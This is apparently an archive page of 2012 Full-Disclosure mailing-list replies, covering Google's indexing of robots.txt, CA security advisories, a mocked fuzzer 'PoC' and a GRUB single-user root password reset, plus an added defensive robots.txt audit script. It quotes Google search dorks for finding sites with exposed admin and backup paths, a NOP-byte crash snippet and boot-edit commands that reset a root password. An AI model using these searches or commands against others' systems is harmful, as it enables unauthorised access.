=Wlax
-----END PGP SIGNATURE-----


Re: [Full-disclosure] Google's robots.txt handling

2012-12-10 Thread James Lay
On 2012-12-10 12:25, Hurgel Bumpf wrote:
> Hi list,
>
>
> I tried to contact Google, but as they didn't answer my email, I am
> forwarding this to FD.
> This "security" feature is not clearly a Google vulnerability, but it
> exposes website information that is not really intended to be
> public.
>
> (Additionally, I have to say that I advocate robots.txt files without
> sensitive content, and working security mechanisms.)
>
> Here is an example:
>
> An admin has a public web service running with folders containing
> sensitive information. He enters these folders in his robots.txt to
> "protect" them from the indexing process of spiders. As he doesn't
> want the /admin/ GUI to appear in the search results he also puts his
> /admin in the robots.txt and finally makes a backup to the folder
> /backup.
>
> Nevertheless, these folders aren't browsable, but they might contain
> f(a)iles with easy-to-guess name structures, non-encrypted
> authentication (simple AUTH), you name it...
>
> Without a robots.txt nobody would know about the existence of these
> folders, but as some folders might be linked somewhere, these folders
> might appear in search results when not defined in the robots.txt. The
> admin finds himself in a catch-22 situation where he seems to prefer
> the robots.txt file.
>
> Long story short.
>
> Although google accepts and respects the directives of the robots.txt
> file, google INDEXES these files.
>
> This is my concern.
>
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+Disallow%3A+%2Fadmin
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+Disallow%3A+%2Fbackup
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+Disallow%3A+%2Fpassword
>
> As these searches can be used less for targeted attacks, they more
> can be used to find victims.
>
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+%2FDisallow%3A+wp-admin
> 
> http://www.google.com/search?q=inurl:robots.txt+filetype%3Atxt+%2FDisallow%3A+typo3
> 
>
> This shouldn't be a discussion about bad practice but the google
> feature itself.
>
> Indexing a file which is used to prevent indexing.. isn't that just
> paradoxical and hypocritical?
>
> Thanks,
>
>
> Conan the bavarian


I'm wondering if, in perhaps .htaccess, one could allow ONLY site 
crawlers access to the robots.txt file.  Then add robots.txt to 
robots.txt...would this mitigate some of the risk?

James

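The exposure the post describes can be checked from the defender's side: the following added example (not code from the thread or its posters) parses a robots.txt and flags Disallow rules that advertise sensitive-looking paths, using the fragments from the searches above as an assumed keyword list and a constructed sample file. Note that the .htaccess idea keys on the User-Agent header, which any client can set, so flagged paths still need real access control (or a per-page noindex header) rather than concealment.

```python
"""Audit a robots.txt for Disallow rules that name sensitive-looking paths.

Added example, not code from the thread.  The sample robots.txt is
constructed, and SENSITIVE_HINTS is an assumed list taken from the
searches in the post (admin, backup, password, wp-admin, typo3).
"""
from typing import Dict, List

# Assumed list of path fragments worth flagging; extend it for your own site.
SENSITIVE_HINTS = ("admin", "backup", "password", "wp-admin", "typo3")

# Constructed sample file; not a real site.
SAMPLE_ROBOTS = """\
# constructed sample robots.txt
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /images/
Allow: /

User-agent: Googlebot
User-agent: Bingbot
Disallow: /wp-admin/
Disallow: /typo3/
Sitemap: https://example.invalid/sitemap.xml
"""


def parse_robots(text: str) -> List[Dict[str, str]]:
    """Return one record per (agent, directive, value) triple.

    Consecutive User-agent lines form a group that shares the rules
    which follow them; a rule line closes the group, so the next
    User-agent line starts a fresh one.
    """
    records: List[Dict[str, str]] = []
    agents: List[str] = ["*"]   # rules before any User-agent apply to everyone
    collecting = False          # True while still reading User-agent lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not collecting:
                agents = []
                collecting = True
            agents.append(value)
        else:
            collecting = False
            for agent in agents:
                records.append({"agent": agent, "directive": field, "value": value})
    return records


def audit_robots(text: str) -> List[Dict[str, str]]:
    """Return the Disallow rules whose path contains a sensitive-looking fragment."""
    findings = []
    for rec in parse_robots(text):
        if rec["directive"] != "disallow" or not rec["value"]:
            continue   # 'Disallow:' with an empty value allows everything
        hits = [hint for hint in SENSITIVE_HINTS if hint in rec["value"].lower()]
        if hits:
            # report the most specific fragment, e.g. 'wp-admin' rather than 'admin'
            findings.append({"agent": rec["agent"],
                             "path": rec["value"],
                             "hint": max(hits, key=len)})
    return findings


def exposed_paths(text: str) -> List[str]:
    """Distinct flagged paths, sorted: what this file advertises to anyone who reads it."""
    return sorted({f["path"] for f in audit_robots(text)})


if __name__ == "__main__":
    for f in audit_robots(SAMPLE_ROBOTS):
        print(f"{f['agent']:<10} Disallow {f['path']:<12} (matches '{f['hint']}')")
```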

Re: [Full-disclosure] (no subject)

2012-11-15 Thread James Condron
I would be interested to see a real world application of OP's
informative point though I do think vendor response is needed too.

Has anybody come across this in the wild?

On Thu, Nov 15, 2012 at 2:01 PM, Sanguinarious Rose
 wrote:
> I found this to be of high informational value, I do agree completely
> with the statement thus given.
>
> Please, tell us more about how you came to these conclusions, how this
> impacts this community, and the social dynamics of our society as a
> whole.
>
> Best Regards
>
> On Thu, Nov 15, 2012 at 7:02 AM, mohit tyagi  
> wrote:
>>
>



[Full-disclosure] CA20121001-01: Security Notice for CA License

2012-10-01 Thread Williams, James K

CA20121001-01: Security Notice for CA License

Issued: October 01, 2012


CA Technologies Support is alerting customers to two potential risks in CA 
License (also known as CA Licensing).  Vulnerabilities exist that can 
allow a local attacker to execute arbitrary commands or gain elevated 
access.  CA Technologies has issued patches to address the vulnerabilities.

The first vulnerability, CVE-2012-0691, occurs due to insecure use of 
system commands.  An unprivileged user can exploit this vulnerability to 
execute commands with system or administrator privileges.

The second vulnerability, CVE-2012-0692, occurs due to inadequate user 
validation.  An unprivileged user can exploit this vulnerability to create 
or modify arbitrary files and gain elevated access.


Risk Rating

High


Affected Platforms

AIX 5.x
DEC
HP-UX
Linux
Mac OS X
Solaris
Windows


Affected Products

CA Aion Business Rules Expert r11.0
CA ARCserve Backup r12.5, r15, r16
CA ARCserve Central Protection Manager r16
CA ARCserve Central Reporting r16
CA ARCserve D2D r15, r16, r16 On Demand
CA ARCserve Central Host Based VM Backup  (formerly CA ARCserve Host Based 
   VM Backup) r16
CA ARCserve Central Virtual Standby (formerly CA ARCserve Virtual 
   Conversion Manager) r16
CA Automation Point r11.2, r11.3
CA Client Automation (formerly CA Desktop and Server Management) r12.0, 
   r12.0 SP1, r12.5
CA Common Services (CCS) r11.2 SP2
CA ControlMinder (formerly CA Access Control) 12.5, 12.6
CA ControlMinder for Virtual Environments (formerly CA Access Control for 
   Virtual Environments) 2.0
CA Database Management r11.3, r11.4, r11.5
CA Directory 8.1
CA Easytrieve for Windows and UNIX 11.0, 11.1
CA Easytrieve for Linux PC 11.6
CA Erwin Data Modeler r7.x
CA Fast Unload for Distributed Databases 11.3, 11.4, 11.5
CA Gen r8
CA IdentityMinder (formerly CA Identity Manager) r12 CR16 and earlier
CA Insight Database Performance Manager 11.3, 11.4, 11.5
CA IT Asset Manager (ITAM) r12.6 and earlier
CA IT Client Manager r12.0, r12.0 SP1, r12.5
CA IT Inventory Manager r12.0, r12.0 SP1, r12.5
CA NSM r11.0, r11.1, r11.2, r11.2 SP1, r11.2 SP2
CA Output Management Web Viewer 11.5
CA Plex r6, r6.1
CA Repository for Distributed Systems r2.3
CA Service Accounting r12.5, r12.6
CA Service Catalog r12.5, r12.6
CA Service Desk Manager r12.1, r12.5, r12.6
CA Single Sign-On (SSO) r8.1, r12.0, r12.1 CR4 and earlier
CA Software Change Manager 12.0 FP2, 12.1, 12.1 SP1, 12.1 SP2, 12.1 SP3
CA Software Compliance Manager r12.0, r12.6
CA Storage Resource Manager (SRM) 11.8, 12.6
CA TSreorg for Distributed Databases 11.3, 11.4, 11.5
CA Unicenter Asset Portfolio Management r11.3, r11.3.4, r12.6
CA Workload Automation AE 4.5.0, 4.5.1, r11, r11.3
CA Workload Automation DE r11.3
CA XCOM Data Transport Gateway PC Linux r11.5
CA XCOM Data Transport Gateway Windows r11.5
CA XCOM Data Transport for PC Linux r11.5
CA XCOM Data Transport for Windows r11.5
CA XCOM Data Transport Management Center for PC Linux r11.5
CA XCOM Data Transport Management Center for Windows r11.5


Affected Components

CA License 1.90.02 and earlier


Non-Affected Products

CA ControlMinder (formerly CA Access Control) 12.6 SP1
CA Client Automation 12.5 SP1
CA Directory r12.0 SP1 or later
CA Gen r8.5
CA IdentityMinder (formerly CA Identity Manager) r12.5
CA IT Client Manager r12.5.SP1
CA IT Inventory Manager r12.5.SP1
CA Plex r7.0
CA Service Accounting r12.7
CA Service Catalog r12.7
CA Service Desk Manager r12.7
CA Single Sign-On (SSO) r12.1 CR5
CA Storage Resource Manager (SRM) 12.6 SP1
CA Workload Automation DE r11.1 (does not use CA License)


Non-Affected Components

CA License 1.90.03 or later


How to determine if the installation is affected

All versions of CA License before 1.90.03 are vulnerable.

The installed version of CA License can be obtained by using the 
"lic98version" program.  Lic98version retrieves the version of CA License 
installed on a machine along with the version of specific individual files.
The version information is written to the lic98version.log file located in 
the CA License installation location, and is also displayed on the console.


Solution

CA has issued patches to address the vulnerability.


For all CA product installations on Linux, please note these Linux-specific
instructions:

1.  First, make backups of the ca.olf file and the lic98.dat file.
2.  Uninstall the existing/old version of CA License.
3.  Perform the installation of CA License 1.90.04.
4.  Confirm the successful installation of 1.9.04, and then replace the 
existing ca.olf file and lic98.dat file with the files you backed 
up in step 1.

If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/ 


CA Aion Business Rules Expert r11.0:
Download and install CA License v1.90.04 or later for Windows and Linux 
platforms, or v1.90.03 or later for all other platforms:
https:

Re: [Full-disclosure] Full-Disclosure Digest, Vol 91, Issue 23

2012-09-18 Thread James
Unsubscribe

Sent from my iPad

On 18/09/2012, at 10:47 PM, full-disclosure-requ...@lists.grok.org.uk wrote:

> Send Full-Disclosure mailing list submissions to
>full-disclosure@lists.grok.org.uk
> 
> To subscribe or unsubscribe via the World Wide Web, visit
>https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
>full-disclosure-requ...@lists.grok.org.uk
> 
> You can reach the person managing the list at
>full-disclosure-ow...@lists.grok.org.uk
> 
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
> 
> 
> Note to digest recipients - when replying to digest posts, please trim your 
> post appropriately. Thank you.
> 
> 
> Today's Topics:
> 
>   1. Re: Adobe Flash UpdateInstalls Other Warezwithout Consent
>  (Jeffrey Walton)
> 
> 
> --
> 
> Message: 1
> Date: Mon, 17 Sep 2012 13:59:12 -0400
> From: Jeffrey Walton 
> Subject: Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
>without Consent
> To: Christian Sciberras 
> Cc: Disclosure ,BugTraq
>
> Message-ID:
>
> Content-Type: text/plain; charset="utf-8"
> 
> Hi Christian,
> 
>> So, I was updating flash on a computer lately, when I noticed the
>> prompt below*, reminding me of this conversation.
> It's a different URL. The URL I used was provided by the Adobe Flash Update
> Service.
> 
> Considering how bad they've done in userland, it's a scary thought they are
> installing software at an elevated privilege level (and IT allows it).
> 
>> or maybe it just took me a few weeks to photoshop this
> If you can't program them or secure them, you might as well paint on them.
> 
> Jeff
> 
> On Mon, Sep 17, 2012 at 1:39 PM, Christian Sciberras wrote:
> 
>> So, I was updating flash on a computer lately, when I noticed the prompt
>> below*, reminding me of this conversation.
>> 
>> *or maybe it just took me a few weeks to photoshop thisyou decide.
>> 
>> To the more reasonable readers, I guess Adobe could have had a genuine
>> mistake / bug in their codenothing new.
>> Don't know why it's such a big deal.
>> 
>> 
>> 
>> [image: Inline image 1]
>> On Sun, Sep 9, 2012 at 11:21 PM, Marcio B. Jr. 
>> wrote:
>> 
>>> You may be interested in getting acquainted with the fact that life is
>>> possible (it's actually stupendously better) without crapware.
>>> 
>>> On Thu, Sep 6, 2012 at 2:09 PM, Jeffrey Walton 
>>> wrote:
>>>> The company that writes the world's most insecure software [1,2,3] has
>>>> figured out a way to further increase an attack surface.
>>>>
>>>> Adobe now includes additional warez in their updates without consent.
>>>> The warez includes a browser and tools bar. The attached image is what
>>>> I got when I agreed to update Adobe Flash because of recent security
>>>> vulnerability fixes.
>>>>
>>>> It appears Adobe has become a whore to Google like Mozilla.
>>>>
>>>> +1 Adobe.
>>>>
>>>> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>>>> [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>>>> [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>>>> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>>>>
>>>> [SNIP]
>>> 
>> 
> -- next part --
> An HTML attachment was scrubbed...
> URL: 
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20120917/6db9e97e/attachment.html
>  
> -- next part --
> A non-text attachment was scrubbed...
> Name: not available
> Type: image/png
> Size: 211549 bytes
> Desc: not available
> Url : 
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20120917/6db9e97e/attachment.png
>  
> 
> --
> 
> 
> End of Full-Disclosure Digest, Vol 91, Issue 23
> ***
> 



[Full-disclosure] CA20111208-01: Security Notice for CA SiteMinder [updated]

2012-08-27 Thread Williams, James K

CA20111208-01: Security Notice for CA SiteMinder


Issued: December 08, 2011
Updated: August 22, 2012


CA Technologies Support is alerting customers to a potential risk in 
CA SiteMinder, CA Federation Manager, CA SOA Security Manager, CA 
SiteMinder Secure Proxy Server, and CA SiteMinder SharePoint Agent. A 
vulnerability exists that can allow a malicious user to execute a 
reflected cross site scripting (XSS) attack. CA Technologies has 
issued patches to address the vulnerability.

The vulnerability, CVE-2011-4054, occurs due to insufficient 
validation of postpreservationdata parameter input utilized in the 
login.fcc form. A malicious user can submit a specially crafted 
request to effectively hijack a victim's browser.


Risk Rating

Medium


Platform

All


Affected Products

CA SiteMinder R6 SP6 CR7 and earlier
CA SiteMinder R12 SP3 CR8 and earlier
CA Federation Manager 12.1 SP3 and earlier
CA SOA Security Manager 12.1 SP3 and earlier
CA SiteMinder Secure Proxy Server 12.0 SP3 and earlier
CA SiteMinder Secure Proxy Server 6.0 SP3 and earlier
CA SiteMinder SharePoint Agent 12.0 SP3 and earlier


Non-Affected Products

CA SiteMinder R6 SP6 CR8
CA SiteMinder R12 SP3 CR9
CA Federation Manager 12.1 SP3 CR00.1
CA SOA Security Manager 12.1 SP3 CR01.1
CA SiteMinder Secure Proxy Server 12.0 SP3 CR01.1
CA SiteMinder Secure Proxy Server 6.0 SP3 CR07.1
CA SiteMinder SharePoint Agent 12.0 SP3 CR0.1


How to determine if the installation is affected

Check the Web Agent log or Installation log to obtain the installed 
release version. Note that the "webagent.log" file name is 
configurable by the SiteMinder administrator.


Solution

CA has issued patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR8 or later

CA SiteMinder R12:
Upgrade to R12 SP3 CR9 or later

CA Federation Manager 12.1 SP3:
Apply fix RS47435

CA SOA Security Manager 12.1 SP3:
Apply fix RS47436

CA SiteMinder Secure Proxy Server 12.0 SP3:
Apply fix RS47431

CA SiteMinder Secure Proxy Server 6.0 SP3:
Apply fix RS47432

CA SiteMinder SharePoint Agent 12.0 SP3:
Apply fix RS47433

CR releases can be found on the CA SiteMinder Hotfix/Cumulative 
Release page (URL may wrap):
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5AE61E29-C3DE-405E-9151-9EEA72D965CE}.


Workaround

None


References

CVE-2011-4054 - CA SiteMinder login.fcc XSS

Acknowledgement

CVE-2011-4054 - Jon Passki of Aspect Security, via CERT

Change History

Version 1.0: Initial Release
Version 1.1: Updated R6 fix information
Version 1.2: Added information for Federation Manager, SOA Security 
Manager, SiteMinder Secure Proxy Server, SiteMinder SharePoint Agent


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com




Re: [Full-disclosure] ZDI-12-145 : Symantec Endpoint Protection SemSvc.exe AgentServlet Remote Code Execution Vulnerability

2012-08-22 Thread James Lay
On 2012-08-22 09:40, ZDI Disclosures wrote:
>
> ZDI-12-145 : Symantec Endpoint Protection SemSvc.exe AgentServlet 
> Remote
> Code Execution Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-12-145
> August 22, 2012

> - -- Vendor Response:
> Symantec has issued an update to correct this vulnerability. More 
> details
> can be found at:
> 
> http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se
> curity_advisory&pvid=security_advisory&year=2012&suid=20120522_01
>
> - -- Disclosure Timeline:
> 2011-10-28 - Vulnerability reported to vendor
> 2012-08-22 - Coordinated public release of advisory
>


According to the link, they published a fix in May of this year?  Did I 
miss something?  Thanks.

James



Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

2012-07-31 Thread James Condron
In which case I would like his follow up email read both on my wedding night 
and funeral (hopefully different nights)

Sent using BlackBerry® from Orange

-Original Message-
From: Thor 
Date: Tue, 31 Jul 2012 10:09:06 
To: 
Cc: kaveh ghaemmaghami; 
; 
Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption  
PoC

Nope.  He's serious.  We had an offline discussion (if you want to call it 
that) where he maintains it is a problem and that other people "appreciate" it.

t


On Jul 31, 2012, at 9:25 AM, James Condron wrote:

> It's a piss take. Of course it's a piss take.
> 
> Sent using BlackBerry® from Orange
> 
> -Original Message-
> From: kaveh ghaemmaghami 
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Sun, 29 Jul 2012 15:08:44 
> To: 
> Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption
>   PoC
> 
> I think ur on vacation now aren't u  Plus nobody ask u to read my
> post and i am not interested about ur opinion keep it for yourself
> 
> On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
>  wrote:
>> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
>> Crash : http://imageshack.us/f/217/axman.jpg/
>> Date: July 28, 2012
>> Author: coolkaveh
>> coolka...@rocketmail.com
>> Https://twitter.com/coolkaveh
>> Vendor Homepage: http://digitaloffense.net/tools/axman/
>> version : 1.0.0
>> Tested on: windows 7 SP1
>> 
>>Crash The Exploiter
>> Lame HD Moore fuzzer Memory Corruption
>>  By Awsome coolkaveh
>> 
>> ---
>> 
>> import os
>> import win32api
>> crash = "  Crash The Exploiter  "
>> lame="Lame HD Moore fuzzer Memory corruption  "
>> awsome="   By Awsome coolkaveh  "
>> print
>> print
>> print
>> print crash
>> print
>> print lame
>> print
>> print awsome
>> print
>> print
>> print
>> print
>> exploit = ("\x90" *800)
>> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
> 



Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC

2012-07-31 Thread James Condron
It's a piss take. Of course it's a piss take.

Sent using BlackBerry® from Orange

-Original Message-
From: kaveh ghaemmaghami 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sun, 29 Jul 2012 15:08:44 
To: 
Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption
PoC

I think ur on vacation now aren't u  Plus nobody ask u to read my
post and i am not interested about ur opinion keep it for yourself

On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
 wrote:
> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
> Crash : http://imageshack.us/f/217/axman.jpg/
> Date: July 28, 2012
> Author: coolkaveh
> coolka...@rocketmail.com
> Https://twitter.com/coolkaveh
> Vendor Homepage: http://digitaloffense.net/tools/axman/
> version : 1.0.0
> Tested on: windows 7 SP1
> 
> Crash The Exploiter
>  Lame HD Moore fuzzer Memory Corruption
>   By Awsome coolkaveh
>
> ---
>
> import os
> import win32api
> crash = "  Crash The Exploiter  "
> lame="Lame HD Moore fuzzer Memory corruption  "
> awsome="   By Awsome coolkaveh  "
> print
> print
> print
> print crash
> print
> print lame
> print
> print awsome
> print
> print
> print
> print
> exploit = ("\x90" *800)
> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)



Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread James Condron
Aand now we degenerate into a political argument nobody but the poster 
gives a fuck about.

Ta for that, maybe take it elsewhere. Let's keep on topic (though we may be 
several posts behind)

Sent using BlackBerry® from Orange

-Original Message-
From: Bzzz 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 8 Jun 2012 20:03:51 
To: 
Subject: Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
 Against Iran

On Fri, 08 Jun 2012 13:36:07 -0400
Laurelai  wrote:

> Excuse me but im a veteran who served 10 years in the Army and I
> damn well earned my right to complain about how broken the system
> is, myself and the soldiers around me sacrificed so that we could
> all have a free country and that yes I could "whine" about it. Its
> called the US Constitution, we took an oath to uphold and defend
> it and everything it stands for. 

And in 10 years you didn't understand how the system is working,
that you were following orders from people that won't ever take
any risk (nor their family & friends), that are themselves receiving
their orders from big money/business/politics you'll never see on
tv nor in any newspaper.

> So while I'm saying here that the civil liberties I swore to
> uphold and defend are eroding away and that evil is triumphing
> over the US, you are telling me this is business as usual.

You are not lucid, your country has _always_ been a rat lab where
masters tell you that you're free, but dig a (tiny) bit and you'll
see that's always been a big fat lie (ie: you pay income taxes?
but the 19th amendment has never been ratified - and your own
justice is enforcing sanctions if you don't pay, knowing what they
do is totally illegal...)

> Just because something evil is the established way of things or is
> becoming the established way of things doesn't mean we have to or
> should accept it. Perhaps *you* should stop being so cold and
> jaded about the evils of the world and put some you know *effort*
> into fixing them instead of trying to shout down anyone who tries
> or talks about trying to make the world better.

I think he's living in a real world and looks at it coldly & without
any indulgence.

> You are honestly implying that there is absolutely nothing that
> can ever be done ever and we should all just lie down and take it,
> can you understand why I might take issue with that perspective?
> You are saying in essence "There is no more room to improve so we
> should never again try."

Thor missed one thing though: he said "people are doing things for 2
reasons; get laid or get paid", there are 2 more reasons: for fun
and for ideals; the latest being the most dangerous thing in the
whole world.

Jean-Yves
-- 
Obviously the only rational solution to your problem is suicide.



Re: [Full-disclosure] Vulnerability in Backtrack

2012-04-25 Thread James Condron
I like it; its kinda like the old one about anonymous hacking FTP
servers and the only way to tell is whether or not you have a user
'anonymous'


On Tue, Apr 24, 2012 at 7:10 PM, Disposable
 wrote:
> Crazy! It works in pretty much every linux by default.
>
> This guy knows stuff. We all got to enroll on that "High School of Security"
> he is talking about!!!
>
>
> On Tue, Apr 24, 2012 at 4:51 PM, David3 Gonnella  wrote:
>>
>> it makes me scary! There is also on my distro! DOH! ;P
>>
>>
>> On 04/24/12 16:41, Urlan wrote:
>> > It makes me laugh! hahahaha
>> >
>> > 2012/4/24 Gage Bystrom 
>> >
>> >> *sigh* vulnerability reports like this make me sad.
>> >> On Apr 24, 2012 5:50 AM, "Григорий Братислава" 
>> >> wrote:
>> >>
>> >>> Is good evening. I is would like to warn you about is vulnerability in
>> >>> Backtrack is all version.
>> >>>
>> >>> Backtrack Linux is penetration tester is system. Is come complete with
>> >>> tool for to make hacking for penetration tester.
>> >>>
>> >>> In is booting Backtrack, vulnerability exist in booting for when start
>> >>> if attacker is edit grub, attacker can bypass restricted user and is
>> >>> boot into admin account. E.g.:
>> >>>
>> >>> grub edit > kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single
>> >>> [ENTER]
>> >>> grub edit > b
>> >>> # mount -t proc proc /proc
>> >>> # mount -o remount,rw /
>> >>> # passwd
>> >>> [ENTER IS ANYTHING YOU WANT]
>> >>> # sync
>> >>> # reboot
>> >>>
>> >>> I is will make this into video for bypassing security in Backtrack for
>> >>> to post on InfoSecInstitute
>> >>>
>> >>> --
>> >>>
>> >>> `Wherever I is go - there am I routed`
>> >>>
>> >>
>> >
>> >
>> >
>>
>
>
>


Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing

2012-04-25 Thread James Condron
Paper list of jurors traditionally.

But yes, spam as far as I can tell.

On Wed, Apr 25, 2012 at 2:46 AM, Alex Buie  wrote:
> What the hell is an "empanelment"?
>



Re: [Full-disclosure] ms12-020 PoC

2012-03-18 Thread James Condron
Nobody said a word.

Relax more and you might live long enough to write your next book.

Sent using BlackBerry® from Orange

-Original Message-
From: "Thor (Hammer of God)" 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sun, 18 Mar 2012 17:03:25 
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ms12-020 PoC

P.S. Before someone starts accusing me of "spamming" for the book, (one asshat 
tried to compare me to Juan whats-his-face once) note you can actually view 
most of the RDP chapter (and others) on the Amazon "preview a page" feature if 
you would like.

If you are interested in RDP security, I suggest you take a free read on 
Amazon.   Many are worried about worm activity from 020, and I am far more 
interested in pointing you to free material that helps you secure yourself and 
others than I am trying to make a buck on the book.  

If anyone has any questions about how any of this works, I'm happy to help if I 
can.

t

>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
>boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
>Sent: Sunday, March 18, 2012 9:21 AM
>To: Nahuel Grisolía; root
>Cc: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] ms12-020 PoC
>
>You establish a connection to TSGateway via RPC over HTTP in an SSL tunnel.
>Once you are authenticated and authorized, the TSGateway server will
>establish a connection via RDP to the target server, tunneling the RDP
>connection back to you within the RPC/HTTP(S) channel.
>
>As such, TSGateway is obviously unaffected by this vulnerability.  For those of
>you looking for mitigation and not kiddie code to pop a box, note that simply
>using NLA mitigates both RDP issues.
>
>This might be a good time to point out that anyone who followed any of my
>advice in the RDP chapter of Thor's Microsoft Security Bible, or who is using
>the little ThoRDP tool I wrote (also in the book) was protected from these
>vulnerabilities way before they were discovered.   I say that to simply
>identify that some simple, effective techniques can be deployed that thwart
>the hours and hours people put into developing exploit code and the wasted
>time chasing all this stuff down.  *THAT* is what security is about, btw.
>
>t
>
>>-Original Message-
>>From: full-disclosure-boun...@lists.grok.org.uk
>>[mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Nahuel
>>Grisolía
>>Sent: Friday, March 16, 2012 11:41 AM
>>To: root
>>Cc: full-disclosure@lists.grok.org.uk
>>Subject: Re: [Full-disclosure] ms12-020 PoC
>>
>>Guys,
>>
>>What about TS Gateway? which is actually listening on port 443 (by def)...
>>
>>thanks!
>>
>>Nahu.
>>
>>On 16 March 2012 15:12, root  wrote:
>>> The SABU code is fake (go figure).
>>> This python script is the first port of the Luigi code to python,
>>> that's why it sucks.
>>>
>>> Here are better ports: http://pastebin.com/4FnaYYMz and
>>> http://pastebin.com/jzQxvnpj
>>>
>>> On 03/16/2012 02:50 PM, Exibar wrote:
>>>> Is that the same code from yesterday?  I thought that code was a
>>>> fake and didn't do anything?
>>>>
>>>> Anyone confirm this?
>>>>
>>>> Exibar
>>>> Sent via BlackBerry by AT&T
>>>>
>>>> -Original Message-
>>>> From: kyle kemmerer 
>>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>>> Date: Fri, 16 Mar 2012 12:01:16
>>>> To: 
>>>> Subject: [Full-disclosure] ms12-020 PoC


>>>
>>
>



Re: [Full-disclosure] is my ISP lying or stupid?

2012-03-18 Thread James Condron
Sorry, I don't mean to be rude but none of that made any sense, especially 
from an ISP perspective.

You will never have a switch per area; it doesn't work like that, you'll have a 
series of distribution routers for routing to customers. Mail, www, shell, SIP, 
whatever will be other services which of course are on one to a million 
switches.  Really doesn't matter as this has nothing to do with anything.

The routers of an ISP are sorta DHCP in the sense that the IPs are dynamic- 
DHCP really works as one network whereas an ISP switch will have a series of 
/30 vlans for obvious reasons. Getting an IP and connection is more complex 
than that but already we're down to a series of routers.

Somewhere in a datacenter (Let's keep it simple for now) is a cabinet with a 
bunch of servers in; one will do customer web space and so on. This cabinet 
will have a switch in and either this went or the router it is connected to.

They're not using teaming. They're not using loadbalancers. 17^39 is a bit of a 
weird one to even have to type out.

Somewhere someone pulled the wrong cable or someone broke a route. These are 
the two things which cause (In my experience) almost all of ISP issues. That or 
a switch died.

And whether they meant switch or not they said switch. Chances are they lost a 
blade or an SFP or whatever.

On 18 Mar 2012, at 15:47, valdis.kletni...@vt.edu wrote:

> On Sun, 18 Mar 2012 12:49:49 -, Peter Maxwell said:
>> On 16 March 2012 19:11, Dave  wrote:
>>> Your ISP probably has their users are on different networks than their
>>> servers.  Sounds like maybe they meant the switch you are on, not the
>>> servers switch.  Need to troubleshoot, use a smart phone or some other OOB
>>> capable device to test access to the ISP servers.  If you can access OOB,
>>> then maybe they aren't lying.  Just a guess, you didnt provide much detail.
> 
>> Unlikely, usually these switches are quite large and when a user has OOB it
>> usually means console access to the server, i.e. nothing to do with network
>> topology.
> 
> I strongly suspect that what Dave meant was:
> 
> 1) There's a switch at the ISP's central site that the services live on.
> 2) There's *another* switch that you and the other subscribers in your
> area are connected to.
> 3) If you can reach the mail server via other means (IP-capable cellphone,
> wireless from the local McDonalds, etc), it's more likely switch (2) than (1).
> 
> The real troubleshooting fun starts when you throw things like load balancers
> and ethernet bonding into the config.  Nice things if they work, but can be
> a bear to diagnose.  If they're doing round-robin, they can end up hosing every
> N'th connection (which is loads of fun when N is in the hundreds).  The other
> common failure mode is hashing each inbound's address to determine which back
> end to go to and certain hash values end up in the bit bucket - so it all works
> great unless your DHCP-supplied IP address is (when treated as a 32-bit number)
> equal to 17 mod 39 or some similar weirdness.  The troubleshooting fun gets
